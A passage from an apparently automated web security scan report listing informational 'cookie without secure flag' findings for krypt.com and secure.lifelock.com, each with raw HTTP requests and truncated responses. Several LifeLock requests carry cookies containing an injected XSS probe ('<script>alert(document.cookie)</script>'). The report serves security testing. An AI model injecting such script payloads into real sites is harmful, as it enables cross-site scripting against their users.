Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.5.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 16:39:20 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:39:24 GMT; path=/; domain=.krypt.com
Location: /order/customize.html?index=2
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 20084


<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - View Ca
...[SNIP]...

11.71. https://secure.krypt.com/checkout/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.krypt.com
Path:   /checkout/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkout/ HTTP/1.1
Host: secure.krypt.com
Connection: keep-alive
Referer: https://secure.krypt.com/order/customize.html?index=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.5.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:40:14 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:40:18 GMT; path=/; domain=.krypt.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 32356


<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - Complet
...[SNIP]...

11.72. https://secure.krypt.com/order/customize.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.krypt.com
Path:   /order/customize.html

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /order/customize.html?index=1 HTTP/1.1
Host: secure.krypt.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.5.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:38:20 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:38:28 GMT; path=/; domain=.krypt.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 48123

<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - Customiz
...[SNIP]...

11.73. https://secure.lifelock.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: secure.lifelock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: C3UID=13014572191303613803; JSESSIONID=C5827A56B251E0E74E04E299DB788ECE.lptom02_8000; TS376161=066cd87e79ce79e47b2024ccfcc7f729945c3cbfd48195b84db4541f; 480-ST=1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11|1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11; __utmz=182152376.1303660958.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; 480-CT=adcon#4/24/2011/16/3/28|1#4/24/2011/16/4/11; 480-PV=3114#4/24/2011/2/56/45; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2016%3A02%3A38%20GMT_20; __utma=182152376.1080477552.1303613800.1303647989.1303660958.3; __utmc=182152376; __utmb=182152376.7.10.1303613800; LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; isWebstoreEnrollmentPage=true; promoCode=NEXT; LifeLockEnrollment=promoCodeHide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 24 Apr 2011 16:56:11 GMT
Location: https://secure.lifelock.com/portal/login/
Content-Length: 0
Cache-Control: max-age=900
Expires: Sun, 24 Apr 2011 17:11:11 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: TS376161=b7f12e4e7a8f676e36aef6838b8fa816945c3cbfd48195b84db4562b; Path=/


11.74. https://secure.lifelock.com/enrollment  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /enrollment

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /enrollment?promocode=next&uid=945440258CD1 HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.7.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59; JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; TS376161=1ab02caf07f2b0502c7d92542a374a3f5438784dc7b0156d4db39461

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:10:01 GMT
Set-Cookie: promoCode=NEXT; Expires=Mon, 25-Apr-2011 03:10:01 GMT
Pragma: no-cache
Cache-Control: no-cache, max-age=0, must-revalidate, max-age=900
Content-Language: en-US
Expires: Sun, 24 Apr 2011 03:25:01 GMT
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Set-Cookie: TS376161=1ab02caf07f2b0502c7d92542a374a3f5438784dc7b0156d4db39461; Path=/
Vary: Accept-Encoding
Content-Length: 22664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>LifeLock.com - E
...[SNIP]...

11.75. https://secure.lifelock.com/enrollment/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /enrollment/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /enrollment/ HTTP/1.1
Host: secure.lifelock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: C3UID=13014572191303613803; JSESSIONID=C5827A56B251E0E74E04E299DB788ECE.lptom02_8000; TS376161=066cd87e79ce79e47b2024ccfcc7f729945c3cbfd48195b84db4541f; 480-ST=1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11|1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11; __utmz=182152376.1303660958.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; 480-CT=adcon#4/24/2011/16/3/28|1#4/24/2011/16/4/11; 480-PV=3114#4/24/2011/2/56/45; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2016%3A02%3A38%20GMT_20; __utma=182152376.1080477552.1303613800.1303647989.1303660958.3; __utmc=182152376; __utmb=182152376.7.10.1303613800; LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; isWebstoreEnrollmentPage=true; promoCode=NEXT; LifeLockEnrollment=promoCodeHide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29;

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:56:07 GMT
Pragma: no-cache
Cache-Control: no-cache, max-age=0, must-revalidate, max-age=900
Content-Language: en-US
Expires: Sun, 24 Apr 2011 17:11:07 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: TS376161=2fac6d3ef891d6bc8f6be2ddc70c080c945c3cbfd48195b84db45627; Path=/
Vary: Accept-Encoding
Content-Length: 25812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>LifeLock.com - E
...[SNIP]...

11.76. https://secure.lifelock.com/portal/account-reset  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /portal/account-reset

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/account-reset HTTP/1.1
Host: secure.lifelock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: C3UID=13014572191303613803; JSESSIONID=C5827A56B251E0E74E04E299DB788ECE.lptom02_8000; TS376161=066cd87e79ce79e47b2024ccfcc7f729945c3cbfd48195b84db4541f; 480-ST=1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11|1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11; __utmz=182152376.1303660958.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; 480-CT=adcon#4/24/2011/16/3/28|1#4/24/2011/16/4/11; 480-PV=3114#4/24/2011/2/56/45; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2016%3A02%3A38%20GMT_20; __utma=182152376.1080477552.1303613800.1303647989.1303660958.3; __utmc=182152376; __utmb=182152376.7.10.1303613800; LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; isWebstoreEnrollmentPage=true; promoCode=NEXT; LifeLockEnrollment=promoCodeHide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29;

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:55:42 GMT
Pragma: no-cache
Cache-Control: no-cache, max-age=0, must-revalidate, max-age=900
Set-Cookie: isWebstoreEnrollmentPage=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Language: en-US
Content-Length: 3714
Expires: Sun, 24 Apr 2011 17:10:42 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: TS376161=692fab84250b2cb5007b0012b4fc7e60945c3cbfd48195b84db4560e; Path=/
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.0 Transitional//EN" >
<html>
   <head>
       <title>myLifeLock - Account Reset</title>
       <link href="../styles/login.css" rel="stylesheet" type="text/css" media="sc
...[SNIP]...

11.77. https://secure.lifelock.com/resources/org.apache.wicket.ajax.AbstractDefaultAjaxBehavior/indicator.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /resources/org.apache.wicket.ajax.AbstractDefaultAjaxBehavior/indicator.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /resources/org.apache.wicket.ajax.AbstractDefaultAjaxBehavior/indicator.gif HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
Referer: https://secure.lifelock.com/portal/login
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; promoCode=NEXT; __utmz=182152376.1303660958.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=182152376.1080477552.1303613800.1303647989.1303660958.3; __utmc=182152376; LifeLockEnrollment=promoCodeHide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2016%3A02%3A38%20GMT_20; 480-CT=adcon#4/24/2011/16/3/28|1#4/24/2011/16/4/11; 480-ST=1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11|1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11; JSESSIONID=C5827A56B251E0E74E04E299DB788ECE.lptom02_8000; TS376161=558a8c6653a460b9c2687d51668e64d388910a444dc07de74db4541e

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:47:27 GMT
Last-Modified: Fri, 22 Apr 2011 04:26:56 GMT
Expires: Sun, 24 Apr 2011 17:47:27 GMT
Cache-Control: max-age=3600
Content-Length: 1553
Connection: close
Content-Type: image/gif
Set-Cookie: TS376161=066cd87e79ce79e47b2024ccfcc7f729945c3cbfd48195b84db4541f; Path=/

GIF89a............................wwwfffUUUDDD333""".........................................................!..NETSCAPE2.0.....!.......,..........w $B..$..B.#..#..(<L....
3.....D....H$^..@....Pd..."U
...[SNIP]...

11.78. https://secure.lifelock.com/resources/org.apache.wicket.ajax.WicketAjaxReference/wicket-ajax.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /resources/org.apache.wicket.ajax.WicketAjaxReference/wicket-ajax.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /resources/org.apache.wicket.ajax.WicketAjaxReference/wicket-ajax.js HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
Referer: https://secure.lifelock.com/enrollment?promocode=next&uid=945440258CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.7.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59; JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; promoCode=NEXT; TS376161=1ab02caf07f2b0502c7d92542a374a3f5438784dc7b0156d4db39461

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:23:50 GMT
Last-Modified: Fri, 22 Apr 2011 05:21:13 GMT
Expires: Sun, 24 Apr 2011 04:23:50 GMT
Cache-Control: max-age=3600
Connection: Keep-Alive
Content-Type: text/javascript;charset=UTF-8
Set-Cookie: TS376161=f6b470b0990eff9da9ecc49d049f8b7d5438784dc7b0156d4db397c6; Path=/
Vary: Accept-Encoding
Content-Length: 45537


if (Function.prototype.bind == null) {
Function.prototype.bind = function(object) {
var __method = this;
return function() {
return __method.apply(object, arguments);
}
}
}

if (typeof(Wicket) == "u
...[SNIP]...

11.79. https://secure.lifelock.com/resources/org.apache.wicket.markup.html.WicketEventReference/wicket-event.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /resources/org.apache.wicket.markup.html.WicketEventReference/wicket-event.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /resources/org.apache.wicket.markup.html.WicketEventReference/wicket-event.js HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
Referer: https://secure.lifelock.com/portal/login
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; isWebstoreEnrollmentPage=true; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.7.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59; JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; TS376161=d566ab28e565142c668f1a3223da9d8931f2a75f23110e424db39461

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:18:53 GMT
Last-Modified: Fri, 22 Apr 2011 05:21:13 GMT
Expires: Sun, 24 Apr 2011 04:18:53 GMT
Cache-Control: max-age=3600
Connection: Keep-Alive
Content-Type: text/javascript;charset=UTF-8
Set-Cookie: TS376161=a42f38caea98de40600af4324215a09331f2a75f23110e424db3969d; Path=/
Vary: Accept-Encoding
Content-Length: 3810


if (Function.prototype.bind == null) {
Function.prototype.bind = function(object) {
var __method = this;
return function() {
return __method.apply(object, arguments);
}
}
}

if (typeof(Wicket) == "u
...[SNIP]...

11.80. https://secure.lifelock.com/scripts/global.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /scripts/global.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scripts/global.js HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
Referer: https://secure.lifelock.com/enrollment?promocode=next&uid=945440258CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.7.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59; JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; promoCode=NEXT; TS376161=1ab02caf07f2b0502c7d92542a374a3f5438784dc7b0156d4db39461

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:23:43 GMT
ETag: W/"3858-1303446290000"
Last-Modified: Fri, 22 Apr 2011 04:24:50 GMT
Cache-Control: max-age=900
Expires: Sun, 24 Apr 2011 03:38:43 GMT
Connection: Keep-Alive
Content-Type: text/javascript
Set-Cookie: TS376161=58e3370f24dce77bbca52bcb5eaf49235438784dc7b0156d4db397bf; Path=/
Vary: Accept-Encoding
Content-Length: 3858

function loadJquery(){$(".info,.help,.infoTip").click(function(){return false}).tipsy({gravity:"w"});$(".help.lefty,.info.lefty").click(function(){return false}).tipsy({gravity:"e"});if($(".accept inp
...[SNIP]...

11.81. https://secure.lifelock.com/siteopt.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /siteopt.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /siteopt.js HTTP/1.1
Host: secure.lifelock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: C3UID=13014572191303613803; JSESSIONID=C5827A56B251E0E74E04E299DB788ECE.lptom02_8000; TS376161=066cd87e79ce79e47b2024ccfcc7f729945c3cbfd48195b84db4541f; 480-ST=1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11|1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11; __utmz=182152376.1303660958.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; 480-CT=adcon#4/24/2011/16/3/28|1#4/24/2011/16/4/11; 480-PV=3114#4/24/2011/2/56/45; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2016%3A02%3A38%20GMT_20; __utma=182152376.1080477552.1303613800.1303647989.1303660958.3; __utmc=182152376; __utmb=182152376.7.10.1303613800; LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; isWebstoreEnrollmentPage=true; promoCode=NEXT; LifeLockEnrollment=promoCodeHide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29;

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 16:56:13 GMT
Pragma: no-cache
Cache-Control: no-cache, max-age=0, must-revalidate, max-age=900
Set-Cookie: isWebstoreEnrollmentPage=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Language: en-US
Expires: Sun, 24 Apr 2011 17:11:13 GMT
Content-Length: 1584
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: TS376161=4a3c0ed3ea5523ba1800bec892f24bb0945c3cbfd48195b84db4562d; Path=/
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.0 Transitional//EN" >
<html>
   <head>
       <title>myLifeLock</title>
       <link href="styles/login.css" rel="stylesheet" type="text/css" media="screen"/>
       <link rel
...[SNIP]...

11.82. https://secure.lifelock.com/styles/login.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /styles/login.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /styles/login.css HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
Referer: https://secure.lifelock.com/portal/login
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; isWebstoreEnrollmentPage=true; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.7.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59; JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; TS376161=d566ab28e565142c668f1a3223da9d8931f2a75f23110e424db39461

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:18:56 GMT
ETag: W/"1705-1303446290000"
Last-Modified: Fri, 22 Apr 2011 04:24:50 GMT
Cache-Control: max-age=900
Expires: Sun, 24 Apr 2011 03:33:56 GMT
Connection: Keep-Alive
Content-Type: text/css
Set-Cookie: TS376161=f5b613a8c090fe06b99a29858ee6feec31f2a75f23110e424db396a0; Path=/
Vary: Accept-Encoding
Content-Length: 1705

body,form,ul,ol,li,table,td,p,h1,h2,h3,img{margin:0;padding:0;border:none;}body{color:#4b4640;font-size:12px;font-family:Verdana,Arial,Helvetica,sans-serif;text-align:center;background-color:#ececec;}
...[SNIP]...

11.83. https://secure.lifelock.com/styles/theme-lifelock.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /styles/theme-lifelock.css

Issue detail

